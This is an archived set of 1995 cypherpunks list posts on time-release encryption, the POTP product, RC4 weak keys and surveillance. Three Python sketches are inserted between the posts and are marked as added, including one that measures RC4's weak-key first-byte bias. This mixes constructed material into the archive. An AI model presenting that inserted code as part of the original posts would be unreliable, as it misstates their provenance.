Message-ID: <199511111953.MAA26503@nagina.cs.colorado.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

 Bryce wrote:
>
> Can anyone explain what use this theoretical "time-sensitive" crypto
> box would be good for?


 Sameer wrote:
> 
> 	Suppose you die.


Hey!  Who do you think you are?


:-)


Just kidding.  When I woke up this morning I realized what I was
missing:  the decryption might be out of your hands, such as when
you die, or you might *want* it to be out of your hands for some
other reason.


With that in mind, I can think of only one unalterable lower-limit
on the time of a decryption--  the speed of light.  Suppose you
encrypt your data with successive layers of keys, K1-Kn.  Then you
encrypt each key with its predecessor, encrypting Kn with Kn-1,
encrypting Kn-1 with Kn-2, etc.  Destroy all copies of unencrypted
keys except for K1, which has not been encrypted.  Now put all
odd-numbered keys in location A and all even-numbered keys in
location B, which is 1 light minute from location A.  Once an agent
has received Key 1, it will take at least n minutes to decrypt 
the data.  Of course, the agent could just take copies of all of the 
keys from location B on some physical media and transport the media 
to location A, which would make the lower bound on time to be "much 
longer than 1 minute".


Hm.  Suppose the n different keys are in n different physical
locations, and the agent does not know where the k+1 location is
until he decrypts the material at the k location.  The "scavenger
hunt" scheme for timed decryption.  Of course this doesn't mean that
you have to bury your crypto box and make a map with an "X" marking
the spot.  Each key could be held by a crypto box which is
publicly accessible on the Net.  The important thing is that
the decrypting agent can't retrieve the k+1 piece until he has 
decrypted the k piece.  Then the lower bound on time of decryption 
is...  um...  Well it depends on the location of the decrypting agent 
with respect to the locations of the n pieces.  (Neglecting, still, 
transmission overhead and decryption time.)  I'm not sure what the 
lower bound actually is, but it can be increased simply by adding more 
pieces to the puzzle.


A single station could serve up multiple pieces.  It would only
reveal the k piece if the querying agent can prove that he has the 
k-1 piece.  Of course if the total number of stations is small then 
the "physically move the pieces" trick might work.


Bryce

signatures follow


            "To strive, to seek, to find and not to yield."   
    <a href="http://www-ugrad.cs.colorado.edu/~wilcoxb/Niche.html">

                          bryce@colorado.edu                   </a>



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.01

iQCVAwUBMKT/JPWZSllhfG25AQFDlwQAhWHB//NeYM8vylQcBDWbNmScrVoCjUdR
TmXVDtnLCZcrAv233l+H3SpdEQmMwQwQCQrM52AreQWMYTSBLuxqr7j9SbpZjek2
FFCMDezbvBPX3ZIuX3SVwrdHa6dm4qgGtpKyfFHxDAn39p+T/HJ+uKaZbA7YVbTC
U6NnnfYv1k8=
=/2+H
-----END PGP SIGNATURE-----
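The chained-key "scavenger hunt" from the message above, as an added Python sketch (not code from the post). Assumptions made here: a toy SHA-256 XOR stream stands in for a real cipher so the example needs only the standard library, each piece carries the name of the station holding the next one, and "proving you have the k-1 piece" is modelled as presenting an HMAC tag derived from the previous key.

```python
import hashlib
import hmac
import secrets

KEY_LEN = 32

def xor_crypt(key: bytes, data: bytes, label: bytes) -> bytes:
    """Toy stream cipher (assumption, not a vetted design): XOR with
    SHA-256(key | label | offset) blocks. Encrypt and decrypt are identical.
    The label keeps the data layer and the key-wrapping layer on separate streams."""
    out = bytearray()
    for offset in range(0, len(data), 32):
        pad = hashlib.sha256(key + label + offset.to_bytes(8, "big")).digest()
        out.extend(b ^ p for b, p in zip(data[offset:offset + 32], pad))
    return bytes(out)

def release_tag(key: bytes) -> bytes:
    """Proof of possession of a key that does not reveal the key to the station."""
    return hmac.new(key, b"release-next-piece", hashlib.sha256).digest()

class Station:
    """Holds wrapped pieces; hands one out only against the matching release tag."""
    def __init__(self, name: str):
        self.name = name
        self._pieces = {}                      # release tag -> wrapped piece

    def deposit(self, tag: bytes, wrapped: bytes) -> None:
        self._pieces[tag] = wrapped

    def fetch(self, proof: bytes) -> bytes:
        for tag, wrapped in self._pieces.items():
            if hmac.compare_digest(tag, proof):
                return wrapped
        raise PermissionError(f"station {self.name}: no piece for that proof")

def build_vault(secret: bytes, n: int, stations: list):
    """Encrypt under K1..Kn, wrap each Kk under K(k-1), scatter the wrapped keys.
    With stations [A, B], odd-numbered keys land at A and even-numbered at B."""
    keys = [secrets.token_bytes(KEY_LEN) for _ in range(n)]   # keys[0] is K1
    ciphertext = secret
    for key in reversed(keys):                                # Kn innermost
        ciphertext = xor_crypt(key, ciphertext, b"data")

    def home(k: int) -> Station:                              # k is 1-based
        return stations[(k - 1) % len(stations)]

    for k in range(2, n + 1):
        next_location = home(k + 1).name if k < n else ""     # last piece ends the hunt
        piece = keys[k - 1] + next_location.encode()
        prev = keys[k - 2]
        home(k).deposit(release_tag(prev), xor_crypt(prev, piece, b"wrap"))
    first_location = home(2).name if n > 1 else ""
    return ciphertext, keys[0], first_location                # only K1 stays in the clear

def open_vault(ciphertext: bytes, k1: bytes, first_location: str, directory: dict):
    """Walk the chain. Every hop needs the key recovered on the previous hop,
    so the hops cannot be issued in parallel; round_trips counts them."""
    keys, location, round_trips = [k1], first_location, 0
    while location:
        wrapped = directory[location].fetch(release_tag(keys[-1]))
        piece = xor_crypt(keys[-1], wrapped, b"wrap")
        keys.append(piece[:KEY_LEN])
        location = piece[KEY_LEN:].decode()
        round_trips += 1
    plaintext = ciphertext
    for key in keys:
        plaintext = xor_crypt(key, plaintext, b"data")
    return plaintext, round_trips

if __name__ == "__main__":
    directory = {"A": Station("A"), "B": Station("B")}
    ct, k1, first = build_vault(b"constructed sample secret", 6,
                                [directory["A"], directory["B"]])
    print(open_vault(ct, k1, first, directory))
```

The delay floor is the number of sequential round trips times the one-way-and-back latency between stations; it says nothing about an agent who physically collects the stations' contents, the caveat the message itself raises.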




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 14 Nov 1995 08:21:32 +0800
To: frantz@netcom.com (Bill Frantz)
Subject: Re: coding and nnet's
In-Reply-To: <199511102255.OAA10734@netcom16.netcom.com>
Message-ID: <199511111800.NAA23831@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Bill Frantz writes:
> At 14:17 11/10/95 -0500, Atp3000@aol.com wrote:
> >I just recently got interested in coding and cryptography, and I was
> >wondering if you could suggest 3 or 4 papers that addresses the application of
> >neural networks in cryptography.
> 
> Perhaps neural nets could be used in an unknown plain text, brute force
> attack to automatically select possible decryptions for human examination. 
> I don't know of any papers on the subject.

I remember seeing a good paper by our own David Wagner on how to do
this without anything more than some ordinary statistics -- no
complicated junk required. David, if you are reading this, could you
comment?

Perry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 14 Nov 1995 08:19:53 +0800
To: cypherpunks@toad.com
Subject: Re: Love Bugs
In-Reply-To: <199511110054.BAA15772@utopia.hacktic.nl>
Message-ID: <199511111814.NAA23863@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous writes:
> The Nov 11 WSJ reports on the scare tactics of security
> consultants in the U.S. and by their co-conspiring
> counterparts -- spies -- abroad:

There is no November 11th WSJ -- the Wall Street Journal is only
published Monday through Friday.

The topic you are covering isn't especially relevant, either.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 14 Nov 1995 08:12:16 +0800
To: jgrubs@left.webcasters.com
Subject: Re: POTP Security
In-Reply-To: <gate.RXLDeD1w165w@left.webcasters.com>
Message-ID: <199511111827.NAA23896@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



jgrubs@left.webcasters.com writes:
> >The first commercially available implementation of our 
> >POTP (Power One Time Pad) encryption algorithm. The package includes 
> >a POTP Secure FTP Client, POTP Secure FTP Server, and POTP FileCrypt - 
> >a stand alone file encryption program.
> 
> What level of security does this cute, little puppy provide???

None whatsoever is my guess.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 14 Nov 1995 08:18:48 +0800
To: "James M. Cobb" <jcobb@ahcbsd1.ovnet.com>
Subject: Re: POTP Security
In-Reply-To: <Pine.BSD.3.91.951111001407.24482H-100000@ahcbsd1.ovnet.com>
Message-ID: <199511111833.NAA23915@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



>  As far as marketing goes, this product is not going to disappear.
>  We have been premarketing security technology for four years through
>  beta, and one year in pilot with international Fortune 100 companies.

They would be smart not to give the names of their clients because
good samaritans might inform them of the quality of their product.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blancw@accessone.com
Date: Tue, 14 Nov 1995 13:28:01 +0800
To: j.fletcher@stirling.ac.uk
Subject: Re: Q: Bookshop in Seattle
Message-ID: <9511112134.AA29395@pulm1.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain



  Can someone point me towards a bookshop in Seattle that is likely to
have the second edition of Applied Cryptography ? 
.......................................

 Tower Books (I've seen it advertised there)
 The University BookStore (probably)
 Barnes & Noble (potentially)


  ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Tue, 14 Nov 1995 08:00:34 +0800
To: cypherpunks@toad.com
Subject: Re: Lotus Notes RSA Implementation Question
In-Reply-To: <9511102035.AA6927@moe.iris.com>
Message-ID: <30A52187.44EB@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Bob Glassley wrote:
> >>2)  Considering RC4 is a proprietary scheme, have there been any
> >>concerted efforts to validate its strength or lack of?  If so, could
> >>you give a pointer to any documents I could review.
> >>
> >There has been considerable discussion of the security of RC4 on this list, and
> >some subtle (i.e. worrisome but not disastrous) weaknesses have been
> >found. Lotus Notes' use of RC4 is not subject to the weaknesses disclosed
> >to date because it does not encrypt recognizable plaintext with the first few
> >bytes of the RC4 stream.
> 
> My understanding was that the problems exposed with RC4 that you
> mentioned, were with the particular implementation by Netscape.  I
> guess I better go back to the archive and do some reading. :-)

Some RC4 keys that begin with specific values make it somewhat easier to
guess the first few bytes of the encrypted data.  This is a (probably
minor) weakness of RC4, and is in no way specific to Netscape.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.
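A key-dependent bias of the kind discussed in this exchange can be measured directly. This added example (not code from the post or from Netscape) implements RC4 and counts how often the first keystream byte equals K[2]+3 for keys with K[0]+K[1] = 0 mod 256, the weak-key class Andrew Roos described in 1995, then repeats the count with the start of the stream discarded. Assumptions: that this is the class being referred to, plus the 16-byte key length, the trial count and the 256-byte discard.

```python
import random

def rc4_keystream(key: bytes, n: int, drop: int = 0) -> bytes:
    """Return n RC4 keystream bytes, optionally discarding the first `drop` bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):                       # key-scheduling algorithm
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    i = j = 0
    out = bytearray()
    for step in range(drop + n):               # output generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        if step >= drop:
            out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)

def first_byte_hit_rate(trials: int, weak: bool, drop: int = 0, seed: int = 1995) -> float:
    """Fraction of constructed random 16-byte keys whose first emitted keystream
    byte equals (K[2] + 3) mod 256. With weak=True, K[1] is forced to -K[0]
    mod 256 so every key falls in the weak class."""
    rng = random.Random(seed)                  # fixed seed: repeatable measurement
    hits = 0
    for _ in range(trials):
        key = bytearray(rng.randrange(256) for _ in range(16))
        if weak:
            key[1] = (-key[0]) & 0xFF
        first = rc4_keystream(bytes(key), 1, drop)[0]
        if first == ((key[2] + 3) & 0xFF):
            hits += 1
    return hits / trials

def compare(trials: int = 2000) -> dict:
    """Hit rates for weak keys, ordinary keys, and weak keys with the first
    256 keystream bytes thrown away before use."""
    return {
        "weak keys": first_byte_hit_rate(trials, weak=True),
        "random keys": first_byte_hit_rate(trials, weak=False),
        "weak keys, drop 256": first_byte_hit_rate(trials, weak=True, drop=256),
    }

if __name__ == "__main__":
    for label, rate in compare().items():
        print(f"{label:22s} {rate:.3f}   (chance is {1 / 256:.3f})")
```

Weak keys hit far above the 1/256 chance level; once the start of the stream is discarded the rate falls back to chance, which is why a protocol that never puts recognizable plaintext under the first few keystream bytes is not exposed to this bias.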




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 14 Nov 1995 18:54:31 +0800
To: cypherpunks@toad.com
Subject: Re: Who needs time vaults anyway?
Message-ID: <v02120d05accab753260f@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>An application that I've seen is financial data, more specifically
>MBS payment info.

In the real world, there's a trustee/nominee of some sort who does this.
What's that to keep that from happening on the net, just like our much
maligned (guy's gotta make a living, fer chrissake!) assassination-payoff
escrow agent...


Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wfgodot@iquest.com (Michael Pierson)
Date: Mon, 13 Nov 1995 15:45:44 +0800
To: cypherpunks@toad.com
Subject: Re: coding and nnet's
In-Reply-To: <951110141713_18585763@mail04.mail.aol.com>
Message-ID: <nuRpw4B4GnSU088yn@iquest.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <951110141713_18585763@mail04.mail.aol.com>, Atp3000 wrote:

>cypherpunks!
>I just recently got interested in coding and cryptography, and I was
>wondering if you could suggest 3 or 4 papers that addresses the application
>of neural networks in cryptography.



I just grepped through "Abstracts in Cryptology" back to 1980 and
"Computer and Communications Security Reviews" up until September
1994 searching for the terms "neural" and "genetic."  The results below
show no evidence of research into the use of neural networks applied
to problems of cryptanalysis (in contrast to genetic algorithms). They
do however indicate their potential utility in such areas as transaction
and traffic analysis, as well as some types of biometric identity
authentication.

I wouldn't be surprised to learn of somebody like FinCEN using
neural-net systems to do pattern analysis on funds transfers and
the like, or the NRO or NSA investing research money into investigating
the usefulness of NNs for image processing or for scanning raw ELINT,
SIGINT or COMINT data.  In fact, I'd be quite surprised if they weren't.

While NNs may not be of direct relevance to cryptanalysis, I suspect
they are, or will be, of great relevance to the task of identifying
what communications should be cryptanalyzed or otherwise scrutinized.
Especially given the high volume of traffic our 'thinkpol' aspire to
be able to listen to.



 `The use of genetic algorithms in cryptanalysis'
 RA Matthews, Cryptologia v 17 no 2 (April 93) pp 187 - 201

 The author presents a genetic system for solving simple
 transpositions.  Candidate column orders are assessed for fitness using
 digram frequencies, and the best of them are used to breed a new
 generation of candidates, using column rotations and swaps as mutation
 operators.  The algorithm was useful at finding partial anagrams to aid
 manual solution.


 `Use of a genetic algorithm in the cryptanalysis of simple substitution
 ciphers'
 R Spillman, M Janssen, B Nelson, M Kepner, Cryptologia v 17 no 1
 (Jan 93) pp 31 - 44

 The authors report using a genetic algorithm to solve monoalphabetic
 substitutions. Randomly chosen keys were evaluated for fitness using
 letter and digram frequencies, and the fittest candidates were then
 `mated' and subjected to mutation to provide the next generation of
 keys.  The `mating' operation used a selective crossover, in which the
 `best' character of each key was passed on.


 `Tearing up the rules'
 P Sampson, Banking Technology (Nov 93) pp 26 - 30

 Mellon Bank has installed a neural-net-based monitoring system which
 checks card transactions every two hours and looks for abnormal
 activity.  It is claimed to be substantially more effective than
 rule-based systems.


 `Cryptanalysis of knapsack ciphers using genetic algorithms'
 R Spillman, Cryptologia v XVII no 4 (Oct 93) pp 367 - 377

 The author describes the design and use of a genetic algorithm to
 attack small trapdoor knapsacks and gives performance data to show
 that it functions 50 - 100 times faster than exhaustive search.


 `Neural networks: the way forward?'
 R Martin, Cards International no 99 (9/12/93)  p 9

 Neural networks are in use to detect abnormal card transactions in
 Mellon Bank and the Eurocard Netherlands network, and both claimed that
 the system would pay for itself in 1-2 years.


 `Identity Verification using Weighted Personal Characteristics'
 Y Yamazaki, N Komatsu, M Tsuchiya, SCIS 94 paper 5C (in Japanese)

 The authors study whether characteristics of a person's handwriting may
 be used to authenticate that person.  They have used a neural net to
 distinguish persons successfully according to the angles between written
 strokes.


 `Comments on "Cryptanalysis of Knapsack Ciphers Using Genetic
 Algorithms" '
 F Rubin, Cryptologia v XVIII no 2 (April 1994) pp 153 - 154

 The author criticises Spillman's use of genetic algorithms to attack
 knapsack ciphers as ineffective against the kind of knapsacks
 actually proposed for non trivial cryptographic use.


 `Securenet: a network-oriented intelligent intrusion prevention and
 detection system'
 P Spirakis, S Katsikas, D Gritzalis, F Allegre, D Androutsopoulos,
 J Darzentas, C Gigante, D Karagiannis, H Putkonen, T Spyrou, IFIP
 SEC 94 paper E2

 This paper describes SECURENET, an intrusion detection system being
 built as an EC RACE project to protect integrated broadband
 communications. It uses a number of technologies, such as neural
 networks and secure distributed computation, to detect and classify
 attacks in real time.


 `Using a genetic algorithm for optimizing fixed polarity Reed-Muller
 expansions of Boolean functions'
 JF Miller, H Luchian, PVG Bradbeer, PJ Barclay, International Journal
 of Electronics v 76 no 4 (Apr 94) pp 601 - 610.

 The authors report a genetic algorithm which gets good sub-optimum
 Reed-Muller expansions of Boolean functions more quickly than previous
 techniques.



- -Michael


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKUpo9GJlWF+GPx9AQHuiQP8Dkp4o23j06TJCprZh7AYYEBH+IJQZzQW
wtlY+SfOzvcu+zEbQcj6q5G/feM7Ld1cmB/GK3u8qBPnM1OOQxxtvkR7dx//7svx
1P/E926zIOLZ3Q7FZqVLrsUdYJuKob+TXC2B4wMIQTFKXrJ0kNWEXvL4UpH26KkD
FEBXOQWnm8k=
=G5N2
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Tue, 14 Nov 1995 07:56:16 +0800
To: anonymous-remailer@shell.portal.com
Subject: Re: DejaNews all over again
In-Reply-To: <199511112036.MAA24650@jobe.shell.portal.com>
Message-ID: <199511112259.RAA20991@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> On Wed, 8 Nov 1995, Jeff Weinstein, self-styled "Electronic Munitions
> Expert", from Netscape Communications: 
> >  Please show us some proof.  All you have done is post unfounded
> >allegations backed up by flawed logic and a misunderstanding of the
> >technology.  Send me a URL, and I will point my navigator at it.  If you
> >can collect my PGP key ring you can gloat here or anywhere else. 
> 
> I think "Jeff" ... Mr. unofficial not speaking for the company Netscape
> spokesperson, I think that you should rethink what you're suggesting. 
> Your tactics won't serve your personal interests on this one.  I really
> would recommend that you come clean.  This is not about "gloating".  I 
> really take very little pleasure in this.


  Jeff, I think it's in your best interest to not waste your time
responding to this moron (who bears many features in common with
Detweiler)

-Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Mon, 13 Nov 1995 10:10:42 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: ACLU Cyber-Liberties Update: Nov. 8, 1995
In-Reply-To: <199511111547.HAA08706@blob.best.net>
Message-ID: <Pine.SOL.3.91.951111175814.24413B-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




On Fri, 10 Nov 1995, James A. Donald wrote:

> At 05:15 PM 11/8/95 -0500, ACLUNATL@aol.com wrote:
> > According to the government's own statistics, 1,800 innocent conversations
> > are intercepted each and every time a wiretap or other form of electronic
> > surveillance is placed.
> 
> This seems curiously inefficient, even for government work.

Only if the government isn't interested in monitoring the 1,800 innocent 
conversations.

-Brad Dolan, 

Who was stopped and questioned at a highway "checkpoint" this morning.
This was the third time this year.

Listen to a few thousand conversations or question a few thousand 
motorists, and you're bound to find somebody up to something.



>  ---------------------------------------------------------------------
>               				|  
> We have the right to defend ourselves	|   http://www.jim.com/jamesd/
> and our property, because of the kind	|  
> of animals that we are. True law	|   James A. Donald
> derives from this right, not from the	|  
> arbitrary power of the state.		|   jamesd@echeque.com
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@omni.voicenet.com>
Date: Mon, 13 Nov 1995 10:12:46 +0800
To: cypherpunks@toad.com
Subject: Re: Who needs time vaults anyway?
In-Reply-To: <Pine.SOL.3.91.951111130652.15607B-100000@chivalry>
Message-ID: <Pine.LNX.3.91.951111181038.160A-100000@localhost>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 11 Nov 1995, Simon Spero wrote:

> Depending on how fine grained you want the release to be, you could also 
> take the inverse of Moore's law, work out how big a key you need to have 
> it unbreakable in less than the desired time, add in whatever fudge 
> factors you feel like based on how much it would be worth to the opponent 
> to get early access, then lock up the secret and throw away the key. 
> 
> Simon
> 

The main problem I would see with this scheme is that it uses Moore's law.
I do not think that Moore's law will hold true forever.  Microchips are
becoming so small that they will eventually reach a point where they will
not be able to be any smaller without facing quantum uncertainty.  At
this point, either the increase in computer speed will stop or something
like parallel processing or quantum computers will become feasible and the
amount of compute time will be very little.  Using this type of scheme
might be useful now, but most likely, a new law about increasing computer
power will have to be developed in the next twenty years.
   
--
`finger -l markm@omni.voicenet.com` for public key and Geek Code
Public Key/1024: 0xF9B22BA5 BD 24 D0 8E 3C BB 53 47  20 54 FA 56 00 22 58 D5
Homepage URL:http://www.voicenet.com/~markm/
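Simon Spero's sizing rule and the objection raised in the reply above, worked through as an added Python example (not code from either post). It sizes a key so that exhaustive search outlasts a target delay under exponential growth in attacker speed, then shows how the actual delay moves when the growth assumption fails. The starting rate of 1e9 keys per second, the 1.5-year doubling period and the stall year are constructed assumptions.

```python
import math

SECONDS_PER_YEAR = 365.25 * 24 * 3600

def work_done(years: float, rate0: float, doubling_years: float) -> float:
    """Keys tried after `years` when the trial rate starts at rate0 keys/year and
    doubles every doubling_years: the integral of rate0 * 2**(t / d) from 0 to years."""
    d = doubling_years
    return rate0 * d / math.log(2) * (2 ** (years / d) - 1)

def key_bits_for_delay(years: float, rate0: float, doubling_years: float,
                       fudge_bits: int = 0) -> int:
    """Smallest key size whose full keyspace outlasts `years` of that growth,
    plus the fudge factor expressed as extra bits."""
    return math.ceil(math.log2(work_done(years, rate0, doubling_years))) + fudge_bits

def years_to_exhaust(bits: int, rate0: float, doubling_years: float,
                     stall_after: float = None) -> float:
    """Years needed to search all 2**bits keys. If stall_after is set, the trial
    rate stops growing at that year and stays flat afterwards."""
    target = 2.0 ** bits
    d = doubling_years
    if stall_after is not None:
        done = work_done(stall_after, rate0, d)
        if done < target:
            final_rate = rate0 * 2 ** (stall_after / d)
            return stall_after + (target - done) / final_rate
    # Inverse of work_done(): solve rate0 * d / ln2 * (2**(T/d) - 1) = target for T.
    return d * math.log2(1 + target * math.log(2) / (rate0 * d))

def scenarios(target_years: float = 20.0) -> dict:
    """Size a key for target_years, then re-evaluate it under other growth curves."""
    rate0 = 1e9 * SECONDS_PER_YEAR            # constructed: 1e9 keys/second today
    bits = key_bits_for_delay(target_years, rate0, 1.5)
    return {
        "key bits": bits,
        "as planned (doubling every 1.5y)": years_to_exhaust(bits, rate0, 1.5),
        "growth stalls at year 10": years_to_exhaust(bits, rate0, 1.5, stall_after=10),
        "doubling every 0.75y instead": years_to_exhaust(bits, rate0, 0.75),
    }

if __name__ == "__main__":
    for label, value in scenarios().items():
        print(f"{label:34s} {value:8.1f}")
```

The same key that was sized for a 20-year delay opens after roughly 11 years if speed doubles twice as fast, and not for centuries if growth stalls, so the release time is only as good as the growth forecast.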




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Mon, 13 Nov 1995 10:26:48 +0800
To: cypherpunks@toad.com
Subject: Re: DejaNews all over again
Message-ID: <v02120d01accae02812ec@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>  Jeff, I think it's in your best interest to not waste your time
>responding to this moron (who bears many features in common with
>Detweiler)

Except for his esteemed "credentials", of course...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA (617) 958-3971
"Reality is not optional." --Thomas Sowell
The e$ Home Page: http://www.webstuff.apple.com/~vinnie/Rah
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Tue, 14 Nov 1995 05:33:18 +0800
To: cypherpunks@toad.com
Subject: Re: POTP Security
Message-ID: <199511111919.UAA08790@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



   We ordered POTP based on the initial blurbs by Kahn and
   others. It took a while to get it, we talked to Elementrix
   HQ and got voicemail, stutters and recordings saying be
   patient. We read c'punks' slash and burns in the waiting
   period. When the boxes appeared, we read the extra-thin
   documents -- mostly PR gush -- reflected, decided to leave
   the red white and blue boxes At No Time Padded.

   Later a POTP distributor's rep called to ask how we like
   the product. We said, haven't tried it, because we learned
   a bit from reading cryptography lists. We wondered if he
   knew what was being said.

   He said, yes, we know, but they're all wrong, it's a
   fabulous product, totally secure.

   How you gonna prove it, we asked, to consumers like us who
   don't know who to believe? You know, we're reading more
   these days about hacks of cryptography and we want to know
   more than press releases. The people you're citing for
   endorsement aren't cryptographers.

   Yes, he said, that's what we're hearing, that's why I'm
   calling you, we're looking for users to endorse the program
   while we're waiting for patent approvals, and trying to get
   the crypto authorities to sign NDA's.

   Sorry, we said, we can't take a chance on your product.
   Call us back after you get the crypto fuck-authorities to
   hack at it in public.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: A.Back@exeter.ac.uk
Date: Mon, 13 Nov 1995 13:16:28 +0800
To: bryce@colorado.edu
Subject: Who needs time vaults anyway?
In-Reply-To: <199511110843.AAA18344@infinity.c2.org>
Message-ID: <13530.199511112217@olib>
MIME-Version: 1.0
Content-Type: text/plain



> > Can anyone explain what use this theoretical "time-sensitive" crypto
> > box would be good for?
>
> 	Suppose you die.

Suppose you get "silenced", or carted off by big brother for thought
crime.  A defense: if you try to silence me, this info gets plastered
all over the net.

Suppose you discovered a polynomial time factoring algorithm (dream
on:-), and wanted to sell it to the highest bidder - what odds that
the NSA would try to obtain it and silence you?  Time-release would be
useful for such things.

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 13 Nov 1995 13:41:41 +0800
To: Duncan Frissell <cypherpunks@toad.com
Subject: Re: "Industry Group Rebuffs U.S. on Encryption"
Message-ID: <199511130522.VAA09142@blob.best.net>
MIME-Version: 1.0
Content-Type: text/plain


At 09:04 PM 11/12/95 -0500, Duncan Frissell wrote:
> There were no nation states or cops prior to 1600.  
> It is perfectly possible that there will be no nation 
> states or cops at some point in the future.

To be strictly correct, there were no cops in the English-speaking world
from the time of the Saxon invasions to the nineteenth century.  There
were however the functional equivalent of cops at some places, and 
some times -- mostly in societies that collapsed or sank into utter 
tyranny.

One can reasonably argue that the Persians and Scythians 
etc were nation states, and that sometimes nation states 
existed during the dark ages and medieval period, but until 
fairly recently, most of what we now call western civilization 
regarded what we would now call a nation state as a rare, 
curious, and pathological aberration.

I expect that we will soon once again regard them as 
pathological, and I hope that we will be able to regard
them as rare.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Mon, 13 Nov 1995 10:35:27 +0800
To: cypherpunks@toad.com
Subject: Re: Timed-release crypto and information economics
In-Reply-To: <199511091621.QAA01045@orchard.medford.ma.us>
Message-ID: <483a87$u5k@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


In article <199511091852.NAA01172@bioanalytical.com>,
Beavis B. Thoopit <beavis@bioanalytical.com> wrote:
> initialize buffer to '12#fjKL3_*(ASDdj1ll3_13 asdfasd-1-3!#!23'
> do forever      /* actually until the plaintext spews out */
>   sleep 1 unit
>   for each element in the buffer
>     buffer[ element ] = magictransform( buffer[ element ] )

But the "sleep one unit" part is vulnerable, unless (a) the whole device
is physically armored, which is probably not easier than armoring a
memory chip; or (b) the process -- the whole device, not just a clock --
is based on some basic principle of physics that has time in the equation.
-- 
Shields.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chen@intuit.com (Mark Chen)
Date: Mon, 13 Nov 1995 20:06:25 +0800
To: jcobb@ahcbsd1.ovnet.com (James M. Cobb)
Subject: Re: POTP Security
In-Reply-To: <Pine.BSD.3.91.951111001407.24482H-100000@ahcbsd1.ovnet.com>
Message-ID: <9511120717.AA25332@doom>
MIME-Version: 1.0
Content-Type: text/plain



> On 11 10 95 jgrubs@left.webcasters.com inquired about POTP 
> security: 
>  
>  What level of security does this cute, little puppy provide??? 
>  
>  
> One approach to answering that inquiry is an excerpt from: 
>  
>  Date: Sat, 21 OCT 95 10:58:51 -0500 
>  From: Paul Jackman <jacktech@delphi.com>
>  Newsgroups: talk.politics.crypto
>  Subject: Re: Elementrix One-Time Pad 
> 
>  
>  ...mine [Jackman's background and experience] goes back to 1961 
>  as Crypto Communications Control Command Center Supervisor for 
>  the National Security Agency (NSA), and US Army Intelligence 
>  Security.  Even so, I do not consider myself expert in either the 
